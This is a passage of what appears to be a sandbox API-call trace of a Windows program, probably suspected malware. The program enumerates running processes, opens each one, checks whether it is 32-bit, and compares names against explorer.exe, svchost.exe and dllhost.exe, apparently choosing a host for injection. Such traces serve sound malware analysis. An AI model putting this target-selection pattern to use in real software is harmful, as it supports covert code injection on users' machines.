th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0182.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0182.440] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0182.441] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0182.441] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0182.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0182.442] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.442] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.442] CloseHandle (hObject=0xec) returned 1 [0182.442] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0182.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0182.443] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0182.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0182.443] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.443] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.443] CloseHandle (hObject=0xec) returned 1 [0182.443] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0182.444] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0182.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0182.444] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0182.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0182.445] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.445] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.445] CloseHandle (hObject=0xec) returned 1 [0182.445] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0182.445] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0182.445] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0182.445] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0182.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0182.445] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.445] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.446] CloseHandle (hObject=0xec) returned 1 [0182.446] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0182.446] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0182.446] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0182.446] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0182.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0182.446] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.446] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.446] CloseHandle (hObject=0xec) returned 1 [0182.446] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0182.446] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0182.446] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0182.446] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0182.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0182.447] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.447] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.447] CloseHandle (hObject=0xec) returned 1 [0182.447] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0182.447] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0182.447] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0182.447] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0182.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0182.447] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.448] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.448] CloseHandle (hObject=0xec) returned 1 [0182.448] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0182.448] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0182.448] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0182.448] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0182.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0182.448] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.448] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.448] CloseHandle (hObject=0xec) returned 1 [0182.448] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0182.448] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0182.448] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0182.448] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0182.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0182.449] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.449] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.449] CloseHandle (hObject=0xec) returned 1 [0182.449] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0182.449] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0182.449] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0182.449] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0182.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0182.450] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.450] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.450] CloseHandle (hObject=0xec) returned 1 [0182.450] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0182.450] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0182.450] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0182.450] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0182.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0182.450] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.450] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.450] CloseHandle (hObject=0xec) returned 1 [0182.451] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0182.451] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0182.451] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0182.451] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0182.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0182.451] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.451] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.451] CloseHandle (hObject=0xec) returned 1 [0182.451] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0182.451] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0182.451] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0182.451] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0182.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0182.452] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.452] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.452] CloseHandle (hObject=0xec) returned 1 [0182.452] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0182.452] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0182.452] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0182.452] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0182.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0182.453] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.453] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.453] CloseHandle (hObject=0xec) returned 1 [0182.453] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0182.453] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0182.453] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0182.453] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0182.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0182.453] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.453] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.453] CloseHandle (hObject=0xec) returned 1 [0182.453] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0182.453] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0182.454] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0182.454] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0182.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0182.454] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.454] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.454] CloseHandle (hObject=0xec) returned 1 [0182.454] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0182.454] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0182.454] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0182.454] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0182.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0182.455] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.455] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.455] CloseHandle (hObject=0xec) returned 1 [0182.455] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0182.455] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0182.455] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0182.455] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0182.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0182.455] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.455] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.455] CloseHandle (hObject=0xec) returned 1 [0182.456] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0182.456] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0182.456] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0182.456] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0182.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0182.456] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.456] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.456] CloseHandle (hObject=0xec) returned 1 [0182.456] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0182.456] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0182.456] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0182.456] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0182.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0182.457] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.457] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.457] CloseHandle (hObject=0xec) returned 1 [0182.457] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0182.457] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0182.457] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0182.457] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0182.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0182.457] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.457] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.458] CloseHandle (hObject=0xec) returned 1 [0182.458] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0182.458] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0182.458] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0182.458] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0182.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0182.458] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.458] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.458] CloseHandle (hObject=0xec) returned 1 [0182.458] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0182.458] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0182.458] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0182.458] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0182.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0182.459] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.459] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.459] CloseHandle (hObject=0xec) returned 1 [0182.459] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0182.459] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0182.459] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0182.459] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0182.460] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0182.460] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0182.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0182.461] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0182.461] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0182.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0182.462] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0182.462] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0182.463] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.463] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.463] CloseHandle (hObject=0xec) returned 1 [0182.463] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, 